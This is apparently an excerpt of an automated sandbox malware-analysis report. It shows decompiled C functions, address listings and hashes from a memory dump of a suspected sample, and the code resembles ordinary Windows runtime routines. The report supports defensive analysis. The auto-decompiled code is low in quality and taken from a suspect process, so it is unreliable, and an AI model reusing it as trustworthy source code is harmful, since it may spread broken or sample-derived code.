                                                    • Opcode ID: 8878cfa9663c148c143187fbf33a3eac7ccc11bc0d0cc015d4715bedb8a203c3
                                                    • Instruction ID: 303c7ba791c859bf9b037539c286d24fd89be1272abdf34fb6d594f732896565
                                                    • Opcode Fuzzy Hash: 8878cfa9663c148c143187fbf33a3eac7ccc11bc0d0cc015d4715bedb8a203c3
                                                    • Instruction Fuzzy Hash: 34911A31F006259FEB329B6CC84CBADBBE4AB06724F150265FA51EB2D1D7B49E40C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BC600 Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E017BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x18ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E017C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E017FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x18a7b9c; // 0x0
					_t74 = L017D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E017F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L017D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E017FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E017F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L017D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E017F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                    0x017bc608
                                                    0x017bc615
                                                    0x017bc625
                                                    0x017bc62d
                                                    0x017bc635
                                                    0x017bc640
                                                    0x017bc680
                                                    0x017bc687
                                                    0x017bc688
                                                    0x017bc689
                                                    0x017bc694
                                                    0x017bc694
                                                    0x017bc642
                                                    0x017bc64a
                                                    0x017bc697
                                                    0x01827a25
                                                    0x01827a2b
                                                    0x01827a2e
                                                    0x01827a30
                                                    0x01827bea
                                                    0x01827bea
                                                    0x00000000
                                                    0x01827bea
                                                    0x01827a36
                                                    0x01827a43
                                                    0x01827a48
                                                    0x01827a4c
                                                    0x01827a4e
                                                    0x00000000
                                                    0x00000000
                                                    0x01827a58
                                                    0x01827a5a
                                                    0x01827a5b
                                                    0x01827a5c
                                                    0x01827a5d
                                                    0x01827a63
                                                    0x01827a64
                                                    0x01827a6a
                                                    0x01827a6c
                                                    0x01827a6e
                                                    0x018279cb
                                                    0x018279cb
                                                    0x018279ce
                                                    0x018279d0
                                                    0x01827a98
                                                    0x01827a9b
                                                    0x01827a9b
                                                    0x01827a9e
                                                    0x01827aa1
                                                    0x01827bbe
                                                    0x01827bbe
                                                    0x01827bc0
                                                    0x01827be0
                                                    0x01827be0
                                                    0x01827a01
                                                    0x01827a01
                                                    0x01827a05
                                                    0x01827a07
                                                    0x01827a15
                                                    0x01827a15
                                                    0x01827a1a
                                                    0x00000000
                                                    0x01827a1a
                                                    0x01827bc2
                                                    0x01827bc6
                                                    0x01827bc9
                                                    0x01827bcd
                                                    0x01827bcf
                                                    0x018279e6
                                                    0x018279e6
                                                    0x018279eb
                                                    0x018279eb
                                                    0x018279ef
                                                    0x018279f1
                                                    0x00000000
                                                    0x00000000
                                                    0x018279f3
                                                    0x018279f5
                                                    0x018279ff
                                                    0x018279ff
                                                    0x00000000
                                                    0x018279ff
                                                    0x018279f7
                                                    0x018279fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x018279fd
                                                    0x01827bd5
                                                    0x01827bd8
                                                    0x00000000
                                                    0x00000000
                                                    0x01827ba9
                                                    0x01827bac
                                                    0x01827bb0
                                                    0x01827bb1
                                                    0x01827bb1
                                                    0x01827bb6
                                                    0x00000000
                                                    0x01827bb6
                                                    0x01827aa7
                                                    0x01827aaa
                                                    0x00000000
                                                    0x00000000
                                                    0x01827ab2
                                                    0x01827ab3
                                                    0x01827ab5
                                                    0x01827aec
                                                    0x01827aef
                                                    0x01827b25
                                                    0x01827b28
                                                    0x01827b62
                                                    0x01827b64
                                                    0x01827b8f
                                                    0x01827b92
                                                    0x01827b96
                                                    0x01827b98
                                                    0x00000000
                                                    0x00000000
                                                    0x01827b9e
                                                    0x01827b9f
                                                    0x01827ba3
                                                    0x00000000
                                                    0x01827ba3
                                                    0x01827b66
                                                    0x01827b68
                                                    0x01827ae2
                                                    0x01827ae2
                                                    0x00000000
                                                    0x01827ae2
                                                    0x01827b6e
                                                    0x01827b72
                                                    0x01827b75
                                                    0x01827b81
                                                    0x01827b85
                                                    0x01827b87
                                                    0x00000000
                                                    0x00000000
                                                    0x01827b31
                                                    0x01827b34
                                                    0x01827b3c
                                                    0x01827b45
                                                    0x01827b46
                                                    0x01827b4f
                                                    0x01827b51
                                                    0x01827b57
                                                    0x01827b59
                                                    0x01827b59
                                                    0x00000000
                                                    0x01827b59
                                                    0x01827b77
                                                    0x00000000
                                                    0x01827b77
                                                    0x01827b2a
                                                    0x00000000
                                                    0x01827b2a
                                                    0x01827af1
                                                    0x01827af3
                                                    0x00000000
                                                    0x00000000
                                                    0x01827afb
                                                    0x01827afc
                                                    0x01827afe
                                                    0x00000000
                                                    0x00000000
                                                    0x01827b00
                                                    0x01827b03
                                                    0x00000000
                                                    0x00000000
                                                    0x01827b05
                                                    0x01827b09
                                                    0x01827b0d
                                                    0x01827b0f
                                                    0x00000000
                                                    0x00000000
                                                    0x01827b18
                                                    0x01827b1d
                                                    0x00000000
                                                    0x01827b1d
                                                    0x01827ab7
                                                    0x01827ab9
                                                    0x00000000
                                                    0x00000000
                                                    0x01827abf
                                                    0x01827ac1
                                                    0x00000000
                                                    0x00000000
                                                    0x01827ac3
                                                    0x01827ac6
                                                    0x00000000
                                                    0x00000000
                                                    0x01827ac8
                                                    0x01827acc
                                                    0x01827ad0
                                                    0x01827ad2
                                                    0x00000000
                                                    0x00000000
                                                    0x01827adb
                                                    0x00000000
                                                    0x01827adb
                                                    0x018279d6
                                                    0x018279d9
                                                    0x018279dc
                                                    0x01827a91
                                                    0x01827a94
                                                    0x00000000
                                                    0x01827a94
                                                    0x018279e2
                                                    0x00000000
                                                    0x018279e2
                                                    0x01827a74
                                                    0x01827a7a
                                                    0x00000000
                                                    0x00000000
                                                    0x01827a8a
                                                    0x01827a21
                                                    0x01827a21
                                                    0x00000000
                                                    0x01827a21
                                                    0x017bc650
                                                    0x017bc651
                                                    0x017bc656
                                                    0x017bc65c
                                                    0x017bc65d
                                                    0x017bc663
                                                    0x017bc664
                                                    0x017bc66a
                                                    0x017bc66e
                                                    0x018279c5
                                                    0x018279c7
                                                    0x00000000
                                                    0x018279c7
                                                    0x017bc67a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 640e6866ab84d360fcaa1bd0e715d1e6074041524aabf05e50fdb608482d9749
                                                    • Instruction ID: 4e489443da8a23a785c1113f42b3195f2d97556256588094841ebdc17681a32b
                                                    • Opcode Fuzzy Hash: 640e6866ab84d360fcaa1bd0e715d1e6074041524aabf05e50fdb608482d9749
                                                    • Instruction Fuzzy Hash: AB81A3756043159BDB27CE59C880F6BB7E4EBA4364F54486EEE46DB241D330DE80CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0184B8D0 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E0184B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x18a7b9c; // 0x0
				_t124 = L017D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E017F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E017F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E017F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x18a7b9c; // 0x0
									_t92 = L017D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E017F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E017BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0184E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0184E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E017F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                    0x0184b8d9
                                                    0x0184b8e4
                                                    0x00000000
                                                    0x0184b8e6
                                                    0x0184b8f3
                                                    0x0184b8f5
                                                    0x0184b8f5
                                                    0x0184b8f8
                                                    0x0184b920
                                                    0x0184b924
                                                    0x0184b936
                                                    0x0184b939
                                                    0x0184b93d
                                                    0x0184b948
                                                    0x0184b9a0
                                                    0x0184b9a0
                                                    0x0184b9a4
                                                    0x0184b9bf
                                                    0x0184b9c4
                                                    0x0184b9c6
                                                    0x0184b9cd
                                                    0x0184b9d1
                                                    0x0184bad4
                                                    0x0184bad8
                                                    0x0184bada
                                                    0x0184badc
                                                    0x0184badc
                                                    0x0184badf
                                                    0x0184bae0
                                                    0x0184bae2
                                                    0x0184bae4
                                                    0x0184baec
                                                    0x0184baee
                                                    0x0184baf0
                                                    0x0184baf0
                                                    0x0184baec
                                                    0x0184bafb
                                                    0x0184bafc
                                                    0x0184bafe
                                                    0x0184bb01
                                                    0x0184bb01
                                                    0x00000000
                                                    0x0184bb06
                                                    0x0184b9d7
                                                    0x0184b9db
                                                    0x0184b9db
                                                    0x0184b9de
                                                    0x0184b9de
                                                    0x0184b9e4
                                                    0x0184b9e7
                                                    0x0184b9ea
                                                    0x0184b9ec
                                                    0x0184b9ef
                                                    0x0184b9f3
                                                    0x0184ba1b
                                                    0x0184ba1b
                                                    0x0184ba23
                                                    0x0184ba24
                                                    0x0184ba27
                                                    0x0184ba2a
                                                    0x0184ba2b
                                                    0x0184ba2e
                                                    0x0184ba30
                                                    0x0184ba37
                                                    0x0184ba3f
                                                    0x0184ba9c
                                                    0x0184baa2
                                                    0x0184bb13
                                                    0x0184bb15
                                                    0x0184baae
                                                    0x0184baae
                                                    0x0184bab3
                                                    0x0184bab5
                                                    0x0184baba
                                                    0x0184bac8
                                                    0x0184bac8
                                                    0x0184baba
                                                    0x0184bacd
                                                    0x0184bacf
                                                    0x00000000
                                                    0x0184bacf
                                                    0x0184bb1a
                                                    0x00000000
                                                    0x0184bb1c
                                                    0x0184baa7
                                                    0x0184bb11
                                                    0x00000000
                                                    0x0184bb11
                                                    0x0184baa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0184ba41
                                                    0x0184ba41
                                                    0x0184ba41
                                                    0x0184ba58
                                                    0x0184ba5d
                                                    0x0184ba62
                                                    0x00000000
                                                    0x00000000
                                                    0x0184ba64
                                                    0x0184ba67
                                                    0x0184ba68
                                                    0x0184ba69
                                                    0x0184ba6c
                                                    0x0184ba6f
                                                    0x0184ba71
                                                    0x0184ba78
                                                    0x0184ba80
                                                    0x00000000
                                                    0x00000000
                                                    0x0184ba90
                                                    0x0184ba90
                                                    0x0184ba97
                                                    0x00000000
                                                    0x0184ba97
                                                    0x0184b9f5
                                                    0x0184b9f7
                                                    0x0184b9f7
                                                    0x0184b9fa
                                                    0x0184ba03
                                                    0x0184ba07
                                                    0x0184ba0c
                                                    0x0184ba10
                                                    0x0184ba17
                                                    0x00000000
                                                    0x0184b9f7
                                                    0x0184b9a6
                                                    0x0184b9a8
                                                    0x0184b9af
                                                    0x0184b9b3
                                                    0x00000000
                                                    0x00000000
                                                    0x0184b9b9
                                                    0x00000000
                                                    0x0184b9b9
                                                    0x0184b94d
                                                    0x0184b98f
                                                    0x0184b995
                                                    0x0184b999
                                                    0x0184b960
                                                    0x0184b967
                                                    0x0184b968
                                                    0x0184b96a
                                                    0x00000000
                                                    0x0184b96a
                                                    0x0184b99b
                                                    0x0184b99e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0184b99e
                                                    0x0184b951
                                                    0x0184b954
                                                    0x0184b95a
                                                    0x0184b95e
                                                    0x0184b972
                                                    0x0184b979
                                                    0x0184b97d
                                                    0x0184b97f
                                                    0x0184b980
                                                    0x0184b982
                                                    0x0184b984
                                                    0x00000000
                                                    0x0184b984
                                                    0x00000000
                                                    0x0184b926
                                                    0x00000000
                                                    0x0184b926

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 104fbc9073b93e1175074088932f79775ce10970f669467feaabab041fb1e298
                                                    • Instruction ID: 036b38c80d8515e542f1937ff3821306a735c9fd9fcec8befc0d3000f4d5565c
                                                    • Opcode Fuzzy Hash: 104fbc9073b93e1175074088932f79775ce10970f669467feaabab041fb1e298
                                                    • Instruction Fuzzy Hash: BA71003220070AEFE732CF28C848F66BBB5EB44724F154928E655C76A1EF75EA44CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01836DC9 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E01836DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01836B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E017D7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E017F9AE0();
					_t87 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0183795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0183795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0183795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0183795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L017D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01836B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01836B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01836B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01836B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E017D7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E017F9AE0();
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L017D2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L017D2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L017D2400( &_v52);
							}
							if(_v28 >= 0) {
								return L017D2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                    0x01836dd4
                                                    0x01836dde
                                                    0x01836de1
                                                    0x01836de3
                                                    0x01836de6
                                                    0x01836de9
                                                    0x01836dec
                                                    0x01836def
                                                    0x01836df2
                                                    0x01836df5
                                                    0x01836dfe
                                                    0x01836e04
                                                    0x01836e09
                                                    0x01836e0d
                                                    0x01836e18
                                                    0x01836e1b
                                                    0x01836e22
                                                    0x01836e2d
                                                    0x01836e30
                                                    0x01836e36
                                                    0x01836e42
                                                    0x01836e4d
                                                    0x01836e50
                                                    0x01836e55
                                                    0x01836e5c
                                                    0x01836e6e
                                                    0x01836e5e
                                                    0x01836e67
                                                    0x01836e67
                                                    0x01836e73
                                                    0x01836e74
                                                    0x01836e77
                                                    0x01836e7c
                                                    0x01836e7d
                                                    0x01836e8e
                                                    0x01836e93
                                                    0x01836e9c
                                                    0x01836ea8
                                                    0x01836eab
                                                    0x01836eac
                                                    0x01836eb3
                                                    0x01836ecd
                                                    0x01836edc
                                                    0x01836ee2
                                                    0x01836ee5
                                                    0x01836ef2
                                                    0x01836efb
                                                    0x01836f01
                                                    0x01836f06
                                                    0x01836f0b
                                                    0x01836f11
                                                    0x01836f1a
                                                    0x01836f22
                                                    0x01836f26
                                                    0x01836f26
                                                    0x01836f33
                                                    0x01836f41
                                                    0x01836f44
                                                    0x01836f47
                                                    0x01836f54
                                                    0x01836f65
                                                    0x01836f77
                                                    0x01836f7c
                                                    0x01836f82
                                                    0x01836f91
                                                    0x01836f99
                                                    0x01836fa3
                                                    0x01836fae
                                                    0x01836fae
                                                    0x01836fba
                                                    0x01836fbb
                                                    0x01836fbc
                                                    0x01836fc1
                                                    0x01836fc2
                                                    0x01836fd3
                                                    0x01836fd8
                                                    0x01836fd8
                                                    0x01836fdf
                                                    0x01836fe8
                                                    0x01836fee
                                                    0x01836fee
                                                    0x01836ff5
                                                    0x01836ffb
                                                    0x01836ffb
                                                    0x01837004
                                                    0x00000000
                                                    0x0183700a
                                                    0x01837004
                                                    0x01836eb3
                                                    0x01836e9c
                                                    0x01837015

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: e54e9e036968954a0c9d2852392082f7e2f936ec45ed95cef230fe617a5033dc
